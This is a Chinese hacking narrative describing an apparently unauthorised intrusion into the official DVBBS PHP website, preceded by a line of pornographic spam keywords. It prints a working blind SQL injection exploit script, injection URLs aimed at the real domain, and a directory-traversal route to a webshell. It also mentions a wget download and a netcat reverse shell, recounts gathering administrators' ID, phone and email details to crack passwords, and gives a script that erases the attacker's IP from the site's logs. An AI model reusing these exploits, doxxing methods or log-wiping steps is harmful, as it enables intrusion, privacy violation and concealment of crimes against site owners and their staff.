欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

入侵DVBBS php官網(wǎng)詳細(xì)過程(圖)

互聯(lián)網(wǎng)   發(fā)布時(shí)間:2008-10-08 19:36:29   作者:佚名   我要評(píng)論
幾 個(gè)月前,DVBBS php2.0暴了一個(gè)可以直接讀出管理員密碼的sql注入漏洞,當(dāng)時(shí)這個(gè)漏洞出來的時(shí)候

幾 個(gè)月前,DVBBS php2.0暴了一個(gè)可以直接讀出管理員密碼的sql注入漏洞,當(dāng)時(shí)這個(gè)漏洞出來的時(shí)候,我看的心癢,怎么還會(huì)有這么弱 智的漏洞,DVBBS php2.0這套代碼我還沒仔細(xì)看過,于是5月中旬我down下來粗略看了下,接著我花了三天的時(shí)間,拿下p.dvbbs.net,即動(dòng)網(wǎng)php的官方網(wǎng) 站,并得到了webshell??偟膩碚f,這次入侵憑的是二分技術(shù)加一分運(yùn)氣。
一、 SQL注入漏洞:
晚上檢查了好久,終于在topicother.php中發(fā)現(xiàn)了一處sql注入漏洞,但是并不像前段時(shí)間暴的漏洞那么簡(jiǎn)單,因?yàn)椴荒馨衙艽a直接讀出數(shù)據(jù)庫(kù)并顯示出來,這是個(gè)活動(dòng)帖子的報(bào)名主函數(shù),我簡(jiǎn)單搜索了下,1.0好像后來就增加了這個(gè)功能。好了,來看具體函數(shù):
function PostActive_Main(){
……
$TopicID = $GLOBALS['id'];
$activeid = trim($_GET['activeid']);//activeid并沒有過濾
$timemode = $_POST['payment'];
$systemmode = trim($_POST['contact']);
$message = trim($_POST['message']);
$gettimemode = trim($_POST['timemode']);
$getstarttime = trim($_POST['starttime']);
$getendtime = trim($_POST['endtime']);
$getexpiretime = trim($_POST['expiretime']);
if($timemode ==0)
$costnum = 0;
else
$costnum = intval(trim($_POST['payvalue']));
//直接帶進(jìn)來使用了
if( $query = $db->query("SELECT u1.sex,u1.strength,u2.usersex FROM { $dv }active as u1,{ $dv }user as u2 WHERE activeid={ $activeid }")){
$activeinfo =& $db->fetch_array($query);
if( !empty($activeinfo) ) {
$db->free_result($query);
}
}
if( $num = $db->query("SELECT count(*) as num from { $dv }activeuser where activeid='".$activeid."'")){
$activenum = $db->fetch_array($num);
if( !empty($activenum) ) {
$db->free_result($num);
}
}

//如果查取的activeid不正確或者后面注入的條件不成立,則顯示顯示str1:對(duì)不起!本活動(dòng)報(bào)名人數(shù)已滿!
if($activenum['num']>=$activeinfo['strength']){
head(0,0,0,$arrNavMenu);
showmsg($lang['Active_Error.str1']);
exit;
}
//如果activeid正確(后面注入的條件也成立),但沒有登陸,就顯示str2:請(qǐng)登陸后操作!
if ($userid==0) {
head(0,0,0,$arrNavMenu);
showmsg($lang['Active_Error.str2']);
exit;
}

//如果activeid正確并且已經(jīng)登陸了,遞交的時(shí)候沒有遞交聯(lián)系方式,則會(huì)顯示str6這個(gè)錯(cuò)誤:對(duì)不起聯(lián)系方式不能為空或小于8個(gè)字符!
if (''==$systemmode||strlen($systemmode)
首先先確定有沒有activeid為1的活動(dòng)帖子,就是在論壇目錄后加上
topicother.php?t=9&action=join&activeid=1
顯示“對(duì)不起!本活動(dòng)報(bào)名人數(shù)已滿!”則有可能不存在,自己注冊(cè)個(gè)號(hào)進(jìn)去發(fā)個(gè)活動(dòng)帖子先。
根 據(jù)上面解釋,大家是否已經(jīng)看出來該怎么注入啦,并不是什么都需要工具的,想當(dāng)年ACCESS手工注入又不是沒注入過,判斷條件正確就返回正常,錯(cuò)誤就不正 常顯示;這里不也是同樣的道理么,不管有沒登陸,出錯(cuò)都顯示:“對(duì)不起!本活動(dòng)報(bào)名人數(shù)已滿!”,如果判斷條件正確,沒有登陸的話顯示:“請(qǐng)登陸后操 作!”,已經(jīng)登陸了顯示:“對(duì)不起聯(lián)系方式不能為空或小于8個(gè)字符!”于是當(dāng)晚我手動(dòng)測(cè)試了一下官方,并成功獲得了一個(gè)管理員的16位MD5的密碼。興奮 的去睡覺,躺在床上卻怎么也睡不著:怎么去更簡(jiǎn)單的利用呢?一邊思考,一邊入睡,睡著的時(shí)候天都亮了。
5個(gè)小時(shí)后,睡醒了繼續(xù)搞,因?yàn)闆]有 開發(fā)那種application程序的經(jīng)驗(yàn),所以我沒想去寫個(gè)exp工具,但一直手工多麻煩啊,記得以前開發(fā)網(wǎng)站的時(shí)候用ajax去get或者post數(shù) 據(jù)并回顯的,這里是不是也一樣可以?于是自己嘗試寫,輕輕松松寫出個(gè)單一判斷md5某一位的ajax代碼,可是在寫循環(huán)的時(shí)候卻出錯(cuò)了,后來flyh4t 上線丟給我一段代碼,我參考了一下然后一個(gè)可以讀任意DVBBS php站點(diǎn)管理員密碼的基于頁面的Exploit code搞定了(列出主要代碼):
function sendCall(i,j,url,w,p) {
if (p=="temp"){ p=url }
//后臺(tái)密碼、用戶名、關(guān)聯(lián)的前臺(tái)用戶名
switch(parseInt(w)){
case 0:url = p "/**/and/**/ascii(mid(password," i ",1))=" j ")/**/";break;
case 1:url = p "/**/and/**/ascii(mid(username," i ",1))=" j ")/**/";break;
case 2:url = p "/**/and/**/ascii(mid(adduser," i ",1))=" j ")/**/";break;
//前臺(tái)密碼、用戶名
case 3:url = p "/**/and/**/ascii(mid(userpassword," i ",1))=" j ")/**/";break;
case 4:url = p "/**/and/**/ascii(mid(username," i ",1))=" j ")/**/";break;
}
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
//解決FF中跨域問題
try{
netscape.security.PrivilegeManager.enablePrivilege( "UniversalBrowserRead ");
} catch (e) {
alert( "Permission UniversalBrowserRead denied. ");
}
}
xmlHttp.onreadystatechange = function() {
if(xmlHttp.readyState == 4 && xmlHttp.status ==200) {
var str = xmlHttp.responseText;
var md5hash=document.getElementById("md5hash");
if(!str.match(/\u672c\u6d3b\u52a8\u62a5\u540d\u4eba\u6570\u5df2\u6ee1/)) {
pass = String.fromCharCode(j);
md5hash.innerHTML = pass;
j = 48;
i ;
}
else {
if(j == 59&&(parseInt(w)==0||parseInt(w)==3)) { j = 96; }
else { j ; }
}
if(pass.length >= 16) { alert("Exploitation Successfull!. Admin MD5 Hash(or username): " pass); return true; }
sendCall(i,j,url,w,p);
}
}
xmlHttp.open('GET', url, true);
xmlHttp.send(null);
}
工具不支持中文用戶名,但支持字母 數(shù)字 常用符號(hào)組合。
接著就簡(jiǎn)單啦,先判斷下官網(wǎng)后臺(tái)的管理員人數(shù):
http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/10=(select/**/count(*)/**/from/**/dv_admin)
然后判斷一下后臺(tái)管理員id是從多少到多少:
http://p.dvbbs.net/topicother.php?/topicother.php?t=9&action=join&boardid=2&id=1&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/id=1)
然 后可以根據(jù)存在的后臺(tái)id用工具去暴密碼啦,速度還蠻快的,一會(huì)我就成功獲得了后臺(tái)所有的md5 password,cmd5.com去跑了下,只能跑出一個(gè),其他不是not found就是要收費(fèi)。到前臺(tái)轉(zhuǎn)了下,發(fā)現(xiàn)前臺(tái)可以看到的管理員只有幾個(gè),貌似有的后臺(tái)管理員前臺(tái)并不顯示為管理員,不過我也用工具暴出前臺(tái)管理員的密 碼,留著備用,查了下,也只成功跑出了一個(gè)。
由于動(dòng)網(wǎng)的前臺(tái)與后臺(tái)管理員之間有對(duì)應(yīng)關(guān)系,因此不能用這個(gè)管理的前臺(tái)密碼加上那個(gè)管理員的后 臺(tái)密碼去登陸后臺(tái),研究了下代碼跟數(shù)據(jù)庫(kù),后臺(tái)表中的adduser這個(gè)字段就是相對(duì)應(yīng)的前臺(tái)密碼。可是既然這樣,我得到的信息就無法利用,那怎么去獲得 一個(gè)后臺(tái)權(quán)限呢,md5的存在讓注入的光華變的暗淡了,怪不得當(dāng)初那個(gè)漏洞那么簡(jiǎn)單的可以讀密碼那些大牛們都沒把官方站點(diǎn)拿下,官方站不存在白 癡管理員 啊…
又到下午了,還是沒有進(jìn)展,我在想是放棄還是該怎么繼續(xù),去126郵箱翻翻ph4nt0m的一些帖子,我突然想到個(gè)方法…
二、 社會(huì)工程學(xué):
其 實(shí)這是讓我洋洋得意的地方,我自我感覺無論什么技術(shù),都沒社會(huì)工程學(xué)來的讓人心動(dòng),而且只要用用心,社會(huì)工程學(xué)就可以被演繹的淋漓盡致。但是這段讓我非常 興奮的經(jīng)歷,我還是不能多寫,因?yàn)檫@涉及到官方多位管理員的隱私,我只是簡(jiǎn)單的入侵檢測(cè),并不想成為別有用心之人的參考。
簡(jiǎn)單了說一下:由于adduser是中文的話,我的工具暴不了,但我可以用語句猜測(cè)(把a(bǔ)dduser十六進(jìn)制處理下就OK了):
http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/adduser=0x............/**/and/**/id=..)
我用..代替省略掉十六進(jìn)制用戶名,后面的ID也省略下。這樣,我可以輕松的猜出后臺(tái)某個(gè)ID對(duì)應(yīng)的前臺(tái)用戶名,于是我找了幾個(gè)管理員作為突破口。
因 為我有前臺(tái)管理員權(quán)限,于是我從前臺(tái)找了下所有管理員、超級(jí)版主以及可以看到的動(dòng)網(wǎng)團(tuán)隊(duì)的人員的信息,并收集歸攏到一個(gè)txt文件中,然后我去百度跟谷歌 搜索這些管理員的用戶名,搜集一些他們平時(shí)訪問的站點(diǎn)以及留下的信息:生日、身 份 證 號(hào)碼、QQ號(hào)碼、電話號(hào)碼、郵箱等等等,最后根據(jù)這些信息根據(jù)得到的 md5密碼猜測(cè)可能存在的密碼,終于比昏昏然茫茫然的開始好多了,實(shí)在不行的時(shí)候,我再跑到DVBBS的ASP論壇去獲取相關(guān)的信息,終于到最后一個(gè)下午 的努力沒有白費(fèi),我在晚上拿下了DVBBS php官方網(wǎng)站的后臺(tái):

異常興奮,我給flyh4t截了個(gè)圖宣揚(yáng)了下戰(zhàn)果,然后跑到ph4nt0m發(fā)了個(gè)帖子告訴大家社會(huì)工程學(xué)的偉大(結(jié)果被眾大牛牛們鄙視了…寒)
三、 后臺(tái)跨目錄寫文件漏洞:
一天的時(shí)間,我得到后臺(tái)的管理權(quán)限,真的很艱難,但革命尚未結(jié)束,還沒拿到webshell呢,不過一般而言,得到了后臺(tái)權(quán)限,就離webshell不遠(yuǎn)了,flyh4t說寫個(gè)模板就可以搞定了,我沒著急搞,先去吃個(gè)飯…
回來后,我在后臺(tái)用syinfo.php?act=phpinfo看了下系統(tǒng),典型的LAMP
(linux,apache,mysql,php)組合,看來要努力的還很多?。晃野凑粘R?guī)思路準(zhǔn)備寫個(gè)php的模板,可是新建模板的時(shí)候卻出錯(cuò)了:

不是0777權(quán)限,寫不進(jìn)去。怎么辦?
后臺(tái)晃悠,看看可不可以找到另外的突破口,可是很不幸,從晚上翻到凌晨都沒發(fā)現(xiàn)有一處可以利用的地方,可能php后臺(tái)拿webshell的方法我不熟,一直搞慣了asp的站,到php就思路堵塞了,百度了下方法,也沒找到。難道偉大的革命要結(jié)束啦?
翻 了一會(huì),我居然在模板頁面下面看到一個(gè)建目錄的地方,不過依舊沒權(quán)限建,哎,linux就是麻煩,如果是windows肯定不會(huì)權(quán)限這么變態(tài)的,自己的站 一般情況下肯定可以寫的,想到可寫,我突然眼前一亮,對(duì)啊,這個(gè)站可以有可寫的地方啊,比如上傳頭像上傳圖片或者文件,都需要可寫的目錄啊,linux權(quán) 限設(shè)置的雖然變態(tài),但總會(huì)留下個(gè)可以的地方的,可是問題是我該怎么利用?
胡亂嘗試了好多次跨目錄建目錄或者文件失敗后(現(xiàn)在回想回想怎么會(huì)出錯(cuò)的,我把目錄跟英文名搞混淆了),我決定不要盲目搞了,讀讀源代碼,于是我打開admin里的template.php開始讀,這不讀不要緊,一讀居然發(fā)現(xiàn)了可以跨目錄寫文件的漏洞。
胡亂填路徑肯定出錯(cuò),還有出錯(cuò)的原因是中文名一定要輸中文名,英文名稱無所謂,看代碼先:
if(!is_dir($destfile)) {
if ($issafemode = ini_get('safe_mode')) {
show_msg($lang['page_title'], str_replace('{ $TPL_DIR }', $destfile, $lang['tpl.error12']));
footer();
exit;
}
if (!mkdir($destfile, 0777)) {
show_msg($lang['page_title'], $lang['tpl.error4']);
footer();
exit;
}
}
看來$destfile是關(guān)鍵了,再看看這個(gè)變量是什么:
$destfile = simpleMapPath($_POST['add_directory'].'/'.$_POST['add_ename']);
有個(gè)simpleMapPath在過濾啊,怪不得,再看看這個(gè)函數(shù):
function simpleMapPath($path)
{
global $_SERVER;
if (empty($path)) {
return false;
}
$path = preg_replace('#(?:\\ )|(?:/ )#i', '/', $path);
if ($path{ 0 } === '/') {
$documentroot = realpath(str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']));
return $documentroot.$path;
} elseif(substr($path, 0, 3) === '../') {
return $path;
} else {
return ROOT_PATH.$path;
}
}
這段函數(shù)看的我有點(diǎn)無語,實(shí)在看不出來他想過濾什么…專門寫了個(gè)php文件把這個(gè)函數(shù)復(fù)制進(jìn)去本機(jī)測(cè)試了下,完全可以寫進(jìn)上一層的目錄。
無論是絕對(duì)路徑還是相對(duì)路徑都可以輕松在uploadfile里寫個(gè)目錄,然后寫個(gè)模板里面,編輯下,于是拿到了webshell。此時(shí)天都快亮了,想睡覺的,可是睡不著,何不一氣呵成,拿下系統(tǒng)權(quán)限?
四、 失敗的提權(quán):
由于提權(quán)失敗了,所以這部分我也簡(jiǎn)單略過,雖然這花費(fèi)了我一半的時(shí)間,可是水平不濟(jì)啊。管理員權(quán)限給的太變態(tài)了,除了uploadfile,其他所有目錄都不可寫…不管了,有可寫的地方就可以了,先查下服務(wù)器版本,輸入uname -a;id,返回:
Linux p.dvbbs.net 2.6.9-5.ELsmp #1 SMP Wed Jan 5 19:30:39 EST 2005 i686 i686 i386 GNU/Linux
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon),4(adm),7(lp)
檢 查了下perl 、wget,都安裝上了,于是wget一個(gè)comeback.pl,接著用NC反彈下,也成功反彈回來本地shell,心想這么順利啊,接下來就是提權(quán) 了,可是翻遍了milw0rm.com,找了各種提權(quán)的利用程序,就是沒有一個(gè)能成功的,我百度谷歌了N久,網(wǎng)上有關(guān)linux下提權(quán)的文章非常少,有的 基本都是一個(gè)樣,反彈一下然后提權(quán),可是大家能輕松提權(quán)的prtcl.c在這里對(duì)它無可奈何…
到了下午實(shí)在太困了睡了一會(huì)兒,醒來后繼續(xù)搞,但最后還是以失敗告終,并且把它服務(wù)器溢出掛了,我趕緊收手,哎,我太菜了,就不做壞事了,留個(gè)頁面紀(jì)念下:

五、 清理殘留:
Linux下的殘留我就沒辦法了,沒提權(quán)成功,權(quán)限太??;但網(wǎng)站留下來的東西必須清理掉。于是寫個(gè)clear.php:
define('ISDVBBS', TRUE);
require '../inc/config.php';
require '../inc/dv_clssql.php';
$db= new sqldb();
defined('DV_MUF_DB_HOST') AND ($dbhost = DV_MUF_DB_HOST);
$db->connect($dbhost, $dbuser, $dbpw, $dbname , $charset,$pconnect);
//清除我新建的模板
$db->query("DELETE FROM dv_styles WHERE name='啊啊啊'");
//清除我所在的IP后臺(tái)操作日志
$db->query("DELETE FROM dv_log WHERE l_ip='58.213.51.65'");
echo "ok!";
?>
傳到uploadfile里面,瀏覽器里運(yùn)行下,于是ok…

相關(guān)文章

最新評(píng)論